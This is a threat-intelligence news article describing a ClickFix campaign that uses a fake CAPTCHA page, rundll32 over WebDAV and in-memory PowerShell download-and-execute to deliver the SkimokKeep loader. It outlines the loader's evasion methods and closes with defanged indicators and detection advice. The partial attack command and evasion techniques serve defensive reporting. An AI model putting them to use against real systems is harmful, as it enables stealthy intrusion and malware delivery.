New ClickFix Variant Evades PowerShell via Rundll32

A more dangerous variant of the ClickFix attack technique is now actively targeting Windows users. Unlike older versions that leveraged PowerShell or mshta for command execution, this new iteration adopts a different approach.

It uses rundll32.exe and WebDAV, two built-in Windows components, to quietly deliver and execute harmful payloads without triggering most common security alerts.

This shift makes the attack harder to catch, especially for organizations whose defenses are focused mainly on detecting script-based threats.

ClickFix attacks are known for tricking users into running malicious commands on their own computers. In this case, the attacker sets up a fake website disguised as a CAPTCHA verification page.

The site, identified as “healthybyhillary[.]com,” instructs the visitor to press Win + R to open the Windows Run dialog, then paste a pre-copied command using Ctrl + V, and finally press Enter to execute it.

The entire process looks harmless to someone unfamiliar with how these attacks work, making it a very effective social engineering trick.

CyberProof analysts identified this new ClickFix variant during active threat monitoring, noting that it significantly reduces reliance on commonly watched scripting engines.

Instead of calling PowerShell directly at the start, the attack uses rundll32.exe with the WebDAV mini-redirector, which allows Windows to access remote files over HTTP as if they were stored on a local network share.

This means the malicious DLL file is pulled from an attacker-controlled server using a command like rundll32.exe [email protected],#1, where the “#1” refers to an export function using an ordinal number rather than a readable name, adding another layer of obfuscation.

The impact of this approach is significant. Security teams that focus detection rules on PowerShell, mshta, or similar scripting engines may completely miss the early stages of this attack.

The malware blends into normal Windows activity because rundll32.exe is a trusted system tool used every day by legitimate applications.

This means the initial access and payload delivery can happen with very little noise, giving the attacker a clean entry point into the target environment.

Detection Evasion Through Native Windows Components and In-Memory Execution

What makes this ClickFix variant especially tricky is how it handles everything after the first command runs. Once rundll32.exe fetches and loads the remote DLL via WebDAV, the infection moves into a multi-stage process that stays almost entirely in memory.

The chain transitions to PowerShell at a later stage, using Invoke-Expression (IEX) along with Net.WebClient.DownloadString to pull and run additional payloads without writing files to the disk.

Non-interactive flags like -NoP and -NonI are used during PowerShell execution to keep the activity as quiet as possible.

The core payload involved in this chain is a secondary loader called SkimokKeep. It is delivered as a 32-bit Windows DLL named verification.google and uses several advanced methods to avoid detection.

Rather than importing Windows API functions the normal way, it walks the Process Environment Block, commonly known as the PEB, to find loaded system modules and resolves functions using a DJB2-style hashing algorithm.

This approach hides which system functions the malware is actually using, making static analysis much harder.

The payload also checks for sandbox and virtual machine environments using functions like GetSystemMetrics, GetForegroundWindow, and GetSystemTime to detect unusual conditions common in automated analysis systems.

On top of that, it uses anti-debugging checks including timing measurements with GetTickCount and process ID inspection, which cause the malware to behave differently or stop running altogether if it suspects it is being examined.

Telemetry further shows that rundll32.exe injects code into legitimate running processes like chrome.exe and msedge.exe by modifying their memory space, helping the malware maintain access while staying hidden.

Besides this, security teams are strongly advised to monitor all executions of rundll32.exe that include davclnt.dll and DavSetCookie arguments, as this is a strong indicator of WebDAV-based payload delivery.

Implement command-line auditing for known LOLBins, including rundll32.exe, to catch unusual usage patterns early. Restrict or closely monitor outbound WebDAV traffic on port 80 where it is not operationally needed.

Block connections to known malicious IP addresses, including 178.16.53[.]137, 141.98.234[.]27, 46.149.73[.]60, and 91.219.23[.]245, as well as suspicious domains such as mer-forgea.sightup[.]in[.]net and data-x7-sync.neurosync[.]in[.]net.

Additionally, organizations should improve user awareness training focused specifically on fake CAPTCHA pages and ClickFix-style social engineering attacks, as the success of this campaign depends entirely on a user following the on-screen instructions.

Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.